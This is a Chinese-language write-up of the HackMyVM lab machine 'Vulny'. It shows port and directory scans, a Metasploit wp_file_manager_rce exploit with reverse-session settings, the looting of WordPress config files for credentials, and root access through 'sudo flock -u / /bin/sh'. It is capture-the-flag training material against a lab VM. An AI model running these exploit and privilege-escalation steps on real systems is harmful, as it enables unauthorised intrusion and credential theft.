12.Vulny
1. 基本信息^toc
靶机链接:https://hackmyvm.eu/machines/machine.php?vm=Vulny
作者:sml
难度:⭐️⭐️
知识点:wp_file_manager_rce、sudo提权(flock)
2. 信息收集
┌──(root㉿kali)-[~]
└─# nmap -sS 192.168.9.14 -p 1-65535
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 18:57 CST
Nmap scan report for 192.168.9.14
Host is up (0.00033s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
33060/tcp open mysqlx
MAC Address: 08:00:27:74:86:89 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds
┌──(root㉿kali)-[/home/kali/hmv/Vulny]
└─# gobuster dir -u http://192.168.9.14 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x jpg,php,html,png,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.14
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,txt,jpg,php,html,png
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/.php (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 10918]
/javascript (Status: 301) [Size: 317] [--> http://192.168.9.14/javascript/]
/secret (Status: 301) [Size: 313] [--> http://192.168.9.14/secret/]
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
Progress: 1453501 / 1453508 (100.00%)
===============================================================
Finished
===============================================================
首页
/secret
/javascript
wordpress报错了。说找不到config-168.9.14.php文件,虽然保存了但是我们也得到了这个文件夹应该是属于wordpress的
对/screct目录进行扫描
┌──(root㉿kali)-[/home/kali/hmv/Vulny]
└─# dirsearch -u http://192.168.9.14/secret
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg\_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg\_resources.html
from pkg\_resources import DistributionNotFound, VersionConflict
\_|. \_ \_ \_ \_ \_ \_|\_ v0.4.3
(\_||| \_) (/\_(\_|| (\_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/hmv/Vulny/reports/http\_192.168.9.14/\_secret\_24-11-06\_19-07-03.txt
Target: http://192.168.9.14/
[19:07:03] Starting: secret/
[19:07:04] 403 - 277B - /secret/.ht\_wsr.txt
[19:07:04] 403 - 277B - /secret/.htaccess.bak1
[19:07:04] 403 - 277B - /secret/.htaccess.orig
[19:07:04] 403 - 277B - /secret/.htaccess.sample
[19:07:04] 403 - 277B - /secret/.htaccess\_extra
[19:07:04] 403 - 277B - /secret/.htaccess.save
[19:07:04] 403 - 277B - /secret/.htaccess\_orig
[19:07:04] 403 - 277B - /secret/.htaccessBAK
[19:07:04] 403 - 277B - /secret/.htaccessOLD
[19:07:04] 403 - 277B - /secret/.htaccess\_sc
[19:07:04] 403 - 277B - /secret/.htaccessOLD2
[19:07:04] 403 - 277B - /secret/.html
[19:07:04] 403 - 277B - /secret/.htm
[19:07:04] 403 - 277B - /secret/.htpasswd\_test
[19:07:04] 403 - 277B - /secret/.htpasswds
[19:07:04] 403 - 277B - /secret/.httr-oauth
[19:07:04] 403 - 277B - /secret/.php
[19:07:20] 200 - 3KB - /secret/readme.html
[19:07:26] 301 - 322B - /secret/wp-admin -> http://192.168.9.14/secret/wp-admin/
[19:07:26] 301 - 324B - /secret/wp-content -> http://192.168.9.14/secret/wp-content/
[19:07:26] 200 - 511B - /secret/wp-content/
[19:07:26] 500 - 610B - /secret/wp-content/plugins/akismet/admin.php
[19:07:26] 500 - 610B - /secret/wp-content/plugins/akismet/akismet.php
[19:07:26] 200 - 469B - /secret/wp-content/upgrade/
[19:07:26] 200 - 486B - /secret/wp-content/uploads/
[19:07:26] 403 - 277B - /secret/wp-includes/
[19:07:26] 301 - 325B - /secret/wp-includes -> http://192.168.9.14/secret/wp-includes/
[19:07:26] 500 - 0B - /secret/wp-includes/rss-functions.php
[19:07:26] 500 - 3KB - /secret/wp-admin/setup-config.php
/secret/readme.html
/secret/wp-content/
/secret/wp-content/uploads/
这里看起来应该是有一个文件目录泄露
发现了wordpress的插件包
看下里面的readme.txt 获取到了版本 6.0
3. 用msf梭哈
msfconsole
search wp-file-manager
use exploit/multi/http/wp\_file\_manager\_rce
set targeturi /secret/
set rhost 192.168.9.14
set rport 80
set lhost 192.168.9.3
set lport 1199
set forceexploit true
run
shell
数据库信息获取
先把wordpress给他download下来
shell内:
cd /usr/share/wordpress
tar -czvf wordpress.tar.gz \*
exit y //退出shell
download /usr/share/wordpress/wordpress.tar.gz /home/kali/hmv/Vulny/wordpress.tar.gz
端口扫描时发现开放了33060端口 对应的服务时Mysqlx
看下配置文件
cat /usr/share/wordpress/wp-config.php
<?php
*/\*\*\
*\* WordPress's Debianised default master config file*
*\* Please do NOT edit and learn how the configuration works in*
*\* /usr/share/doc/wordpress/README.Debian*
*\*\*\*/*
*/\* Look up a host-specific config file in*
*\* /etc/wordpress/config-<host>.php or /etc/wordpress/config-<domain>.php*
*\*/*
$debian\_server = preg\_replace('/:.\*/', "", $\_SERVER['HTTP\_HOST']);
$debian\_server = preg\_replace("/[^a-zA-Z0-9.\-]/", "", $debian\_server);
$debian\_file = '/etc/wordpress/config-'.strtolower($debian\_server).'.php';
*/\* Main site in case of multisite with subdomains \*/*
$debian\_main\_server = preg\_replace("/^[^.]\*\./", "", $debian\_server);
$debian\_main\_file = '/etc/wordpress/config-'.strtolower($debian\_main\_server).'.php';
if (file\_exists($debian\_file)) {
require\_once($debian\_file);
define('DEBIAN\_FILE', $debian\_file);
} elseif (file\_exists($debian\_main\_file)) {
require\_once($debian\_main\_file);
define('DEBIAN\_FILE', $debian\_main\_file);
} elseif (file\_exists("/etc/wordpress/config-default.php")) {
require\_once("/etc/wordpress/config-default.php");
define('DEBIAN\_FILE', "/etc/wordpress/config-default.php");
} else {
header("HTTP/1.0 404 Not Found");
echo "Neither <b>$debian\_file</b> nor <b>$debian\_main\_file</b> could be found. <br/> Ensure one of them exists, is readable by the webserver and contains the right password/username.";
exit(1);
}
*/\* idrinksomewater \*/*
*/\* Default value for some constants if they have not yet been set*
*by the host-specific config files \*/*
if (!defined('ABSPATH'))
define('ABSPATH', '/usr/share/wordpress/');
if (!defined('WP\_CORE\_UPDATE'))
define('WP\_CORE\_UPDATE', false);
if (!defined('WP\_ALLOW\_MULTISITE'))
define('WP\_ALLOW\_MULTISITE', true);
if (!defined('DB\_NAME'))
define('DB\_NAME', 'wordpress');
if (!defined('DB\_USER'))
define('DB\_USER', 'wordpress');
if (!defined('DB\_HOST'))
define('DB\_HOST', 'localhost');
if (!defined('WP\_CONTENT\_DIR') && !defined('DONT\_SET\_WP\_CONTENT\_DIR'))
define('WP\_CONTENT\_DIR', '/var/lib/wordpress/wp-content');
*/\* Default value for the table\_prefix variable so that it doesn't need to*
*be put in every host-specific config file \*/*
if (!isset($table\_prefix)) {
$table\_prefix = 'wp\_';
}
if (isset($\_SERVER['HTTP\_X\_FORWARDED\_PROTO']) && $\_SERVER['HTTP\_X\_FORWARDED\_PROTO'] == 'https')
$\_SERVER['HTTPS'] = 'on';
require\_once(ABSPATH . 'wp-settings.php');
?>
找不到数据库密码啊,联想到首页提示缺少某个文件猜测就是这个文件
果然在这里
cd /etc/wordpress
ls
config-192.168.1.122.php
htaccess
cat con\*
<?php
define('DB\_NAME', 'wordpress');
define('DB\_USER', 'wordpress');
define('DB\_PASSWORD', 'myfuckingpassword');
define('DB\_HOST', 'localhost');
define('DB\_COLLATE', 'utf8\_general\_ci');
define('WP\_CONTENT\_DIR', '/usr/share/wordpress/wp-content');
?>
利用navicat连接上去
无法连接。
上面wp-config.php里面有一个很奇怪的注释
*/\* idrinksomewater \*/*
有可能是用户密码
提权到adrian用户
su adrian
4. 提权root
sudo -l
Matching Defaults entries for adrian on vulny:
env\_reset, mail\_badpass, secure\_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User adrian may run the following commands on vulny:
(ALL : ALL) NOPASSWD: /usr/bin/flock
sudo flock -u / /bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root